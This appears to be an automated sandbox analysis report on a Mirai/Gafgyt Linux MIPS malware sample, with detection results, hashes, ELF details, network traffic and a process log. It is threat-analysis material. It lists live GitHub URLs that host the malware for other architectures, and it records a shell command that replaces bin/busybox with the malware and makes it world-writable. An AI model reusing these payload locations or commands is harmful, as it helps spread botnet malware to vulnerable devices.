                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTR
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTR
                      Source: Yara matchFile source: .5r3fqt67ew531has4231.mpsl.elf, type: SAMPLE
                      Source: Yara matchFile source: 5458.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5450.1.00007ffa6c400000.00007ffa6c43a000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5450, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: .5r3fqt67ew531has4231.mpsl.elf PID: 5458, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts1
                      Command and Scripting Interpreter
                      1
                      Scripting
                      Path Interception2
                      File and Directory Permissions Modification
                      OS Credential Dumping11
                      Security Software Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      File Deletion
                      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      No configs have been found
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Number of created Files
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572617 Sample: .5r3fqt67ew531has4231.mpsl.elf Startdate: 10/12/2024 Architecture: LINUX Score: 100 26 54.217.10.153, 37674, 443 AMAZON-02US United States 2->26 28 daisy.ubuntu.com 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 4 other signatures 2->36 8 dash rm .5r3fqt67ew531has4231.mpsl.elf 2->8         started        10 dash rm 2->10         started        signatures3 process4 process5 12 .5r3fqt67ew531has4231.mpsl.elf sh 8->12         started        14 .5r3fqt67ew531has4231.mpsl.elf 8->14         started        process6 16 sh rm 12->16         started        18 sh mkdir 12->18         started        20 sh mv 12->20         started        22 sh chmod 12->22         started        24 .5r3fqt67ew531has4231.mpsl.elf 14->24         started       
                      SourceDetectionScannerLabelLink
                      .5r3fqt67ew531has4231.mpsl.elf61%ReversingLabsLinux.Backdoor.Gafgyt
                      .5r3fqt67ew531has4231.mpsl.elf100%AviraLINUX/Mirai.bonb
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      daisy.ubuntu.com
                      162.213.35.24
                      truefalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;/tmp/.5r3.5r3fqt67ew531has4231.mpsl.elffalse
                          high
                          https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.bestone.sh.5r3fqt67ew531has4231.mpsl.elffalse
                            high
                            https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips.5r3fqt67ew531has4231.mpsl.elffalse
                              high
                              https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;sh$.5r3fqt67ew531has4231.mpsl.elffalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/.5r3fqt67ew531has4231.mpsl.elffalse
                                  high
                                  https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7;chmod.5r3fqt67ew531has4231.mpsl.elffalse
                                    high
                                    http://purenetworks.com/HNAP1/.5r3fqt67ew531has4231.mpsl.elffalse
                                      high
                                      https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.arm7$.5r3fqt67ew531has4231.mpsl.elffalse
                                        high
                                        https://github.com/rapoffbeat/special-stuff/raw/refs/heads/main/.5r3fqt67ew531has4231.mips;$.5r3fqt67ew531has4231.mpsl.elffalse
                                          high
                                          http://schemas.xmlsoap.org/soap/envelope/.5r3fqt67ew531has4231.mpsl.elffalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            54.217.10.153
                                            unknownUnited States
                                            16509AMAZON-02USfalse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            54.217.10.153m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                loligang.arm5.elfGet hashmaliciousMiraiBrowse
                                                  vqsjh4.elfGet hashmaliciousMiraiBrowse
                                                    x-3.2-.ISIS.elfGet hashmaliciousGafgytBrowse
                                                      m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        shindeVx86.elfGet hashmaliciousUnknownBrowse
                                                          linux_mips.elfGet hashmaliciousChaosBrowse
                                                            assailant.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              dlr.arm6.elfGet hashmaliciousOkiruBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                daisy.ubuntu.com.5r3fqt67ew531has4231.ppc.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                • 162.213.35.25
                                                                .5r3fqt67ew531has4231.arm6.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                • 162.213.35.25
                                                                16RIueF7yh.elfGet hashmaliciousMiraiBrowse
                                                                • 162.213.35.25
                                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                                • 162.213.35.25
                                                                memfd.elfGet hashmaliciousUnknownBrowse
                                                                • 162.213.35.25
                                                                rarm7.elfGet hashmaliciousMiraiBrowse
                                                                • 162.213.35.24
                                                                s-.-pa.-rc.elfGet hashmaliciousGafgytBrowse
                                                                • 162.213.35.24
                                                                a.-.--.r.--m-.--5.elfGet hashmaliciousGafgytBrowse
                                                                • 162.213.35.25
                                                                p--.-pc.elfGet hashmaliciousGafgytBrowse
                                                                • 162.213.35.24
                                                                s-..-h-.4.elfGet hashmaliciousGafgytBrowse
                                                                • 162.213.35.24
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AMAZON-02USMA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                • 54.244.188.177
                                                                https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                                • 3.5.217.53
                                                                https://app.droplet.io/form/Ko1loyGet hashmaliciousUnknownBrowse
                                                                • 3.23.93.108
                                                                bin.sh.elfGet hashmaliciousUnknownBrowse
                                                                • 54.171.230.55
                                                                Request for Quotation.exeGet hashmaliciousFormBookBrowse
                                                                • 18.141.10.107
                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 18.141.10.107
                                                                http://abercombie.comGet hashmaliciousUnknownBrowse
                                                                • 3.160.188.18
                                                                https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exeGet hashmaliciousUnknownBrowse
                                                                • 13.227.9.131
                                                                https://districtwharfoffices.com/l/homeGet hashmaliciousUnknownBrowse
                                                                • 3.164.182.25
                                                                https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                                • 13.227.2.22
                                                                No context
                                                                No context
                                                                No created / dropped files found
                                                                File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                Entropy (8bit):5.443509387309656
                                                                TrID:
                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                File name:.5r3fqt67ew531has4231.mpsl.elf
                                                                File size:259'092 bytes
                                                                MD5:663ac1bdb34abacde4a22fc79864e968
                                                                SHA1:5772847c44e6d5d560c6a89595fd621ced0c9e1d
                                                                SHA256:451c5699be2feac88af56d5cbfbb5efc9561794ec93844d1a010d9e6bc815f57
                                                                SHA512:4cf9b5d8ff009018451cfecb98e6c28e217a9969cc1a29024da16d157af3658b777c3ac66ec162decb629d7b270d069122a981be1144261668541c9800738344
                                                                SSDEEP:3072:KQI6B2S63X5wy/gFTp6bD9faWpV25qyphC6SCemnrtZmIqwbZnM:K96B2S63pwyHyCIhC/sriHwRM
                                                                TLSH:EF44E70A6F610EF7E8AFCD3712E90B0525CC954B22A43B757574D918F54A64F0AE3CB8
                                                                File Content Preview:.ELF....................`.@.4...........4. ...(...............@...@.@...@...............D...D.G.D.G.<^..............Q.td...............................<.e.'!......'.......................<.e.'!... .........9'.. ........................<.e.'!...$........09

                                                                ELF header

                                                                Class:ELF32
                                                                Data:2's complement, little endian
                                                                Version:1 (current)
                                                                Machine:MIPS R3000
                                                                Version Number:0x1
                                                                Type:EXEC (Executable file)
                                                                OS/ABI:UNIX - System V
                                                                ABI Version:0
                                                                Entry Point Address:0x400260
                                                                Flags:0x1007
                                                                ELF Header Size:52
                                                                Program Header Offset:52
                                                                Program Header Size:32
                                                                Number of Program Headers:3
                                                                Section Header Offset:258532
                                                                Section Header Size:40
                                                                Number of Section Headers:14
                                                                Header String Table Index:13
                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                NULL0x00x00x00x00x0000
                                                                .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                                .textPROGBITS0x4001200x1200x330300x00x6AX0016
                                                                .finiPROGBITS0x4331500x331500x5c0x00x6AX004
                                                                .rodataPROGBITS0x4331b00x331b00x61900x00x2A0016
                                                                .ctorsPROGBITS0x4793440x393440xc0x00x3WA004
                                                                .dtorsPROGBITS0x4793500x393500x80x00x3WA004
                                                                .data.rel.roPROGBITS0x47935c0x3935c0x8b00x00x3WA004
                                                                .dataPROGBITS0x479c200x39c200x4a580x00x3WA0032
                                                                .gotPROGBITS0x47e6800x3e6800xb000x40x10000003WAp0016
                                                                .sbssNOBITS0x47f1800x3f1800x900x00x10000003WAp004
                                                                .bssNOBITS0x47f2100x3f1800x4b100x00x3WA0016
                                                                .mdebug.abi32PROGBITS0x13200x3f1800x00x00x0001
                                                                .shstrtabSTRTAB0x00x3f1800x640x00x0001
                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                LOAD0x00x4000000x4000000x393400x393405.70250x5R E0x10000.init .text .fini .rodata
                                                                LOAD0x393440x4793440x4793440x5e3c0xa9dc1.71280x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 10, 2024 18:25:00.332226992 CET4433767454.217.10.153192.168.2.13
                                                                Dec 10, 2024 18:25:00.332346916 CET37674443192.168.2.1354.217.10.153
                                                                Dec 10, 2024 18:25:00.451939106 CET4433767454.217.10.153192.168.2.13
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 10, 2024 18:25:01.649688959 CET5542753192.168.2.131.1.1.1
                                                                Dec 10, 2024 18:25:01.649760962 CET5444753192.168.2.131.1.1.1
                                                                Dec 10, 2024 18:25:01.792141914 CET53544471.1.1.1192.168.2.13
                                                                Dec 10, 2024 18:25:01.894085884 CET53554271.1.1.1192.168.2.13
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 10, 2024 18:25:01.649688959 CET192.168.2.131.1.1.10x1f67Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                Dec 10, 2024 18:25:01.649760962 CET192.168.2.131.1.1.10xf7edStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 10, 2024 18:25:01.894085884 CET1.1.1.1192.168.2.130x1f67No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                Dec 10, 2024 18:25:01.894085884 CET1.1.1.1192.168.2.130x1f67No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                                                System Behavior

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -f /tmp/tmp.MLUwFpj4Yn /tmp/tmp.6lbeKTnKC1 /tmp/tmp.0oMEmhu7RZ
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -f /tmp/tmp.MLUwFpj4Yn /tmp/tmp.6lbeKTnKC1 /tmp/tmp.0oMEmhu7RZ
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/tmp/.5r3fqt67ew531has4231.mpsl.elf
                                                                Arguments:/tmp/.5r3fqt67ew531has4231.mpsl.elf
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/tmp/.5r3fqt67ew531has4231.mpsl.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/bin/sh
                                                                Arguments:sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/.5r3fqt67ew531has4231.mpsl.elf bin/busybox; chmod 777 bin/busybox"
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -rf bin/busybox
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/mkdir
                                                                Arguments:mkdir bin
                                                                File size:88408 bytes
                                                                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/mv
                                                                Arguments:mv /tmp/.5r3fqt67ew531has4231.mpsl.elf bin/busybox
                                                                File size:149888 bytes
                                                                MD5 hash:504f0590fa482d4da070a702260e3716

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/bin/sh
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/usr/bin/chmod
                                                                Arguments:chmod 777 bin/busybox
                                                                File size:63864 bytes
                                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/tmp/.5r3fqt67ew531has4231.mpsl.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                Start time (UTC):17:25:00
                                                                Start date (UTC):10/12/2024
                                                                Path:/tmp/.5r3fqt67ew531has4231.mpsl.elf
                                                                Arguments:-
                                                                File size:5773336 bytes
                                                                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9